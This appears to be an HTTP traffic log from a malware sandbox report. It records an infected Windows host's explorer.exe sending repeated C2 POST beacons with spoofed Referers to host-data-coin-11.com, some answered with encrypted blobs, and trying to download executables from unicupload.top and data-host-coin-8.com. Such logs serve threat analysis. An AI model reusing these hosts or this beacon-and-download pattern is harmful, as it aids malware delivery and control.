                  TimestampkBytes transferredDirectionData
                  Dec 28, 2021 13:56:04.853841066 CET10824OUTPOST / HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://clunuonr.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 130
                  Host: host-data-coin-11.com
                  Dec 28, 2021 13:56:05.407126904 CET10830INHTTP/1.1 404 Not Found
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:56:05 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  15192.168.2.44985747.251.11.25280C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Dec 28, 2021 13:56:05.972120047 CET10831OUTPOST / HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://pebbfc.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 131
                  Host: host-data-coin-11.com
                  Dec 28, 2021 13:56:06.542974949 CET10832INHTTP/1.1 404 Not Found
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:56:06 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  16192.168.2.44985847.251.11.25280C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Dec 28, 2021 13:56:06.744535923 CET10833OUTPOST / HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://xkoocu.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 359
                  Host: host-data-coin-11.com
                  Dec 28, 2021 13:56:07.296400070 CET10833INHTTP/1.1 404 Not Found
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:56:07 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 2eI:82OO~kEKg2P0


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  17192.168.2.44985954.38.220.8580C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Dec 28, 2021 13:56:07.346076012 CET10834OUTGET /install5.exe HTTP/1.1
                  Connection: Keep-Alive
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Host: unicupload.top
                  Dec 28, 2021 13:56:07.363667965 CET10835INHTTP/1.1 404 Not Found
                  Server: nginx/1.14.0 (Ubuntu)
                  Date: Tue, 28 Dec 2021 12:55:13 GMT
                  Content-Type: text/html
                  Content-Length: 178
                  Connection: keep-alive
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  18192.168.2.44986047.251.11.25280C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Dec 28, 2021 13:56:07.569057941 CET10835OUTPOST / HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://xpkuvjioi.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 144
                  Host: host-data-coin-11.com
                  Dec 28, 2021 13:56:08.121371984 CET10836INHTTP/1.1 200 OK
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:56:07 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 0
                  Connection: close


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  19192.168.2.44986147.251.11.25280C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Dec 28, 2021 13:56:08.681101084 CET10837OUTPOST / HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://nxjfh.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 239
                  Host: host-data-coin-11.com
                  Dec 28, 2021 13:56:09.237057924 CET10837INHTTP/1.1 200 OK
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:56:09 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 0
                  Connection: close


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  2192.168.2.44978847.251.11.25280C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Dec 28, 2021 13:54:50.273237944 CET1546OUTPOST / HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://oabgiwp.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 245
                  Host: host-data-coin-11.com
                  Dec 28, 2021 13:54:50.826272011 CET1547INHTTP/1.1 404 Not Found
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:54:50 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  20192.168.2.44986247.251.11.25280C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Dec 28, 2021 13:56:09.457644939 CET10838OUTPOST / HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://ithwflphmf.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 167
                  Host: host-data-coin-11.com
                  Dec 28, 2021 13:56:10.024442911 CET10839INHTTP/1.1 404 Not Found
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:56:09 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Raw: 33 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c8 89 40 0e 65 1b e4 bf c1 b1 a2 14 a5 08 cd 2c b4 59 52 db 17 f8 ee 39 ec 3f 52 17 b2 ea 93 42 fe 02 86 1c 80 a7 70 9b 77 a7 f9 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 3eI:82O@e,YR9?RBpw0


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  3192.168.2.44979047.251.11.25280C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Dec 28, 2021 13:54:51.034786940 CET1548OUTPOST / HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://hwrkvn.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 291
                  Host: host-data-coin-11.com
                  Dec 28, 2021 13:54:51.603113890 CET1549INHTTP/1.1 404 Not Found
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:54:51 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  4192.168.2.44979147.251.11.25280C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Dec 28, 2021 13:54:51.806477070 CET1550OUTPOST / HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://oskoy.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 206
                  Host: host-data-coin-11.com
                  Dec 28, 2021 13:54:52.354857922 CET1551INHTTP/1.1 404 Not Found
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:54:52 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  5192.168.2.44979247.251.11.25280C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Dec 28, 2021 13:54:52.559643030 CET1552OUTPOST / HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://yhvtxw.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 201
                  Host: host-data-coin-11.com
                  Dec 28, 2021 13:54:53.118556976 CET1552INHTTP/1.1 200 OK
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:54:52 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 0
                  Connection: close


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  6192.168.2.44979347.251.11.25280C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Dec 28, 2021 13:54:53.624316931 CET1553OUTPOST / HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://kfdyfm.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 233
                  Host: host-data-coin-11.com
                  Dec 28, 2021 13:54:54.195750952 CET1554INHTTP/1.1 404 Not Found
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:54:54 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 2dI:82OI:J_J-WS,/0


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  7192.168.2.44979547.251.11.25280C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Dec 28, 2021 13:54:55.598448038 CET1555OUTPOST / HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://jealulibe.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 145
                  Host: host-data-coin-11.com
                  Dec 28, 2021 13:54:56.155267954 CET1556INHTTP/1.1 404 Not Found
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:54:55 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  8192.168.2.44979647.251.11.25280C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Dec 28, 2021 13:54:56.359143019 CET1557OUTPOST / HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://axnxlm.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 318
                  Host: host-data-coin-11.com
                  Dec 28, 2021 13:54:56.915194988 CET1558INHTTP/1.1 404 Not Found
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:54:56 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 4b ef ae 8a 70 bc 57 dd 42 d6 f7 23 8c 21 e6 c3 93 50 2c e2 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 46I:82OR&:UPJ%9KpWB#!P,c0


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  9192.168.2.44979747.251.11.25280C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Dec 28, 2021 13:54:57.251928091 CET1558OUTGET /files/5376_1640094939_1074.exe HTTP/1.1
                  Connection: Keep-Alive
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Host: data-host-coin-8.com
                  Dec 28, 2021 13:54:57.802864075 CET1559INHTTP/1.1 404 Not Found
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:54:57 GMT
                  Content-Type: text/html; charset=iso-8859-1
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Raw: 31 31 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 64 61 74 61 2d 68 6f 73 74 2d 63 6f 69 6e 2d 38 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
